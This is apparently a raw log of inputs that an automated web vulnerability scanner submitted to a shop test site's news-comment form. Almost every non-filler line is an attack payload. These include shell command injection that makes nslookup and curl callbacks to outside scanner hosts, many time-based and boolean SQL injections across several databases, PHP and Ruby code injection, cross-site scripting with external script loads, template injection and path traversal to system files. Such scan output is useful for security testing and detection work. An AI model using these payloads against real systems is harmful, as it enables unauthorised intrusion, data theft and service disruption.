;(nslookup -q=cname hitmqlzyfukxvb76e8.bxss.me||curl hitmqlzyfukxvb76e8.bxss.me)|(nslookup -q=cname hitmqlzyfukxvb76e8.bxss.me||curl hitmqlzyfukxvb76e8.bxss.me)&(nslookup -q=cname hitmqlzyfukxvb76e8.bxss.me||curl hitmqlzyfukxvb76e8.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitwurcvhjgshdc9df.bxss.me||curl${IFS}hitwurcvhjgshdc9df.bxss.me)
'.print(md5(31337)).'
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitpmcllvywfoff0b3.bxss.me||curl${IFS}hitpmcllvywfoff0b3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpmcllvywfoff0b3.bxss.me||curl${IFS}hitpmcllvywfoff0b3.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
https://shoptest.crucial.in/
555
555
555
shoptest.crucial.in
555
'"()
-1 OR 2+305-305-1=0+0+0+1 --
555
555
555'&&sleep(27*1000)*hcecsz&&'
555
-1 OR 2+462-462-1=0+0+0+1
555
555
555"&&sleep(27*1000)*bfyvte&&"
-1' OR 2+961-961-1=0+0+0+1 --
-1' OR 2+398-398-1=0+0+0+1 or 'Mc4KCIBl'='
555'||sleep(27*1000)*qaxvkw||'
-1" OR 2+867-867-1=0+0+0+1 --
555"||sleep(27*1000)*sappdl||"
555*if(now()=sysdate(),sleep(15),0)
555
555
'.gethostbyname(lc('hitwy'.'kfihztqwa5b85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(70).chr(119).chr(78).'
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
".gethostbyname(lc("hitxf"."vlixpstkf47e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(73).chr(117).chr(72)."
555
gethostbyname(lc('hitst'.'cjipfzixa7726.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(88).chr(107).chr(89)
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
NewsCommentAdd
555
555
555-1)); waitfor delay '0:0:15' --
555
555
NewsCommentAdd/.
555-1 waitfor delay '0:0:15' --
555
555mOK9lHkE'; waitfor delay '0:0:15' --
555
555
5554GbW6yYQ'); waitfor delay '0:0:15' --
555
555CptDLjxx')); waitfor delay '0:0:15' --
555
555
555
555
555-1 OR 721=(SELECT 721 FROM PG_SLEEP(15))--
555
555
555-1) OR 354=(SELECT 354 FROM PG_SLEEP(15))--
555
555
555-1)) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
555
555
555odpVIElg' OR 344=(SELECT 344 FROM PG_SLEEP(15))--
555
5556hDlRuFm') OR 119=(SELECT 119 FROM PG_SLEEP(15))--
555
555
555BnYoMA4f')) OR 27=(SELECT 27 FROM PG_SLEEP(15))--
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
'"
555
555
555
<!--
555'"
555
555
555%C0%A7%C0%A2%2527%2522\'\"
555
555
555
@@RPUpt
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(119).concat(75).concat(105).concat(81)+(require"socket"
Socket.gethostbyname("hitni"+"cwuuhawhbcd8c.bxss.me.")[3].to_s)+"
555
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(65).concat(104).concat(76)+(require'socket'
Socket.gethostbyname('hitpm'+'lqubklkgd34d8.bxss.me.')[3].to_s)+'
555
555<esi:include src="http://bxss.me/rpb.png"/>
${9999737+9999282}
'A'.concat(70-3).concat(22*4).concat(120).concat(78).concat(116).concat(78)+(require'socket'
Socket.gethostbyname('hitau'+'glnkghiod50cd.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >2RWr(9984)</ScRiPt>
'"()&%<zzz><ScRiPt >2RWr(9734)</ScRiPt>
555
5559127131
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
bfg10977<s1﹥s2ʺs3ʹhjl10977
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
555
/etc/shells
../../../../../../../../../../../../../../etc/shells
bfgx10039%C0%BEz1%C0%BCz2a%90bcxhjl10039
<%={{={@{#{${dfb}}%>
c:/windows/win.ini
bxss.me
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
555
555
dfb[[${98991*97996}]]xca
555
555
dfb__${98991*97996}__::.x
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >2RWr(9081)</ScRiPt>
555<WORYMC>CZDRC[!+!]</WORYMC>
555
555
555<script>2RWr(9987)</script>
555
555
555
555<script>2RWr(9392)</script>9392
555
555
555
555
555<ScR<ScRiPt>IpT>2RWr(9296)</sCr<ScRiPt>IpT>
555<ScRiPt
>2RWr(9088)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9186></ScRiPt>
555
555<isindex type=image src=1 onerror=2RWr(9221)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9903'>
555
555<body onload=2RWr(9121)>
555<img src=//xss.bxss.me/t/dot.gif onload=2RWr(9581)>
555<img src=xyz OnErRor=2RWr(9160)>
555
555<img/src=">" onerror=alert(9982)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%32%52%57%72%289734%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\2RWr(9650)\u003C/sCripT\u003E
555
555<ScRiPt>2RWr(9086)</sCripT>
%F6<img zzz onmouseover=2RWr(90631) //%F6>
555<input autofocus onfocus=2RWr(9612)>
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(2RWr(9634))}
555SQK6p
<ScRiPt >2RWr(9565)</ScRiPt>
555<WRP53U>TNMML[!+!]</WRP53U>
555
555<ifRAme sRc=9568.com></IfRamE>
555<a9ly09H x=9243>
555
555<img sRc='http://attacker-9464/log.php?
555
555
555<aNLbePp<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9257518*9670593)
'+response.write(9257518*9670593)+'
"+response.write(9257518*9670593)+"
<% response.write(9257518*9670593) %>
+response.write(9257518*9670593)'
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitbs'.'jaamikvff970b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(79).chr(104).chr(86).'
".gethostbyname(lc("hitcx"."raadnakb61277.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(88).chr(109).chr(74)."
gethostbyname(lc('hitst'.'twndeupga0802.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(86).chr(114).chr(82)
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
"+"A".concat(70-3).concat(22*4).concat(122).concat(73).concat(106).concat(86)+(require"socket"
Socket.gethostbyname("hithi"+"fkhivjqe8b0ad.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(106).concat(81).concat(114).concat(66)+(require'socket'
Socket.gethostbyname('hitnx'+'tuyjusxe6c62f.bxss.me.')[3].to_s)+'
555
'A'.concat(70-3).concat(22*4).concat(97).concat(65).concat(122).concat(78)+(require'socket'
Socket.gethostbyname('hithl'+'ccogdftlce356.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+985-985-1=0+0+0+1 --
-1 OR 2+303-303-1=0+0+0+1
-1' OR 2+409-409-1=0+0+0+1 --
-1' OR 2+626-626-1=0+0+0+1 or 'dLlDMB9k'='
-1" OR 2+177-177-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
5550qMMzJwX'; waitfor delay '0:0:15' --
555YKNXqbWa'); waitfor delay '0:0:15' --
555GS5ksfqr')); waitfor delay '0:0:15' --
555-1 OR 237=(SELECT 237 FROM PG_SLEEP(15))--
555-1) OR 391=(SELECT 391 FROM PG_SLEEP(15))--
555-1)) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
555Hz3txthy' OR 33=(SELECT 33 FROM PG_SLEEP(15))--
5554f8B4f8C') OR 78=(SELECT 78 FROM PG_SLEEP(15))--
555DtAA0u3z')) OR 634=(SELECT 634 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@XEEGP
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'CWY6a6I3'='
-1" OR 5*5=25 or "GHi4HyPL"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555m4qwtfOf'; waitfor delay '0:0:15' --
555PxW0sczM'); waitfor delay '0:0:15' --
555fFX4K2Mt')); waitfor delay '0:0:15' --
555-1 OR 62=(SELECT 62 FROM PG_SLEEP(15))--
555-1) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
555-1)) OR 850=(SELECT 850 FROM PG_SLEEP(15))--
555IjsW4CTc' OR 218=(SELECT 218 FROM PG_SLEEP(15))--
555TuICtCy0') OR 203=(SELECT 203 FROM PG_SLEEP(15))--
555ISZQ4bk7')) OR 247=(SELECT 247 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@Fwftg
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'fsedrglK'='
-1" OR 5*5=25 or "HsIqAVvI"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555aqFipMZf'; waitfor delay '0:0:15' --
555pKsfwZsV'); waitfor delay '0:0:15' --
555QrIoZxwU')); waitfor delay '0:0:15' --
555-1 OR 766=(SELECT 766 FROM PG_SLEEP(15))--
555-1) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
555-1)) OR 350=(SELECT 350 FROM PG_SLEEP(15))--
5557XGqqWgq' OR 744=(SELECT 744 FROM PG_SLEEP(15))--
555bbIiIRdJ') OR 854=(SELECT 854 FROM PG_SLEEP(15))--
555E0Bwthmp')) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@I43Ck
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+403-403-1=0+0+0+1 --
-1 OR 2+72-72-1=0+0+0+1
-1' OR 2+875-875-1=0+0+0+1 --
-1' OR 2+471-471-1=0+0+0+1 or '42v44l8d'='
-1" OR 2+928-928-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555XT11zT9S'; waitfor delay '0:0:15' --
555FjGgcjsC'); waitfor delay '0:0:15' --
555tj91QrI4')); waitfor delay '0:0:15' --
555-1 OR 127=(SELECT 127 FROM PG_SLEEP(15))--
555-1) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
555-1)) OR 517=(SELECT 517 FROM PG_SLEEP(15))--
555ZuKVRKYD' OR 591=(SELECT 591 FROM PG_SLEEP(15))--
555RawwCRMm') OR 471=(SELECT 471 FROM PG_SLEEP(15))--
555uHzFCS2z')) OR 392=(SELECT 392 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@cq7Yx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+66-66-1=0+0+0+1 --
-1 OR 2+783-783-1=0+0+0+1
-1' OR 2+818-818-1=0+0+0+1 --
-1' OR 2+458-458-1=0+0+0+1 or 'UDQ1K1ez'='
-1" OR 2+651-651-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
6GEQzIqn'; waitfor delay '0:0:15' --
xrT4mAnp'); waitfor delay '0:0:15' --
dZc6qkhw')); waitfor delay '0:0:15' --
-5 OR 383=(SELECT 383 FROM PG_SLEEP(15))--
-5) OR 671=(SELECT 671 FROM PG_SLEEP(15))--
-1)) OR 769=(SELECT 769 FROM PG_SLEEP(15))--
fKNhEMO7' OR 814=(SELECT 814 FROM PG_SLEEP(15))--
j4mubLmC') OR 157=(SELECT 157 FROM PG_SLEEP(15))--
qIIy2svO')) OR 59=(SELECT 59 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@ng3pF
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555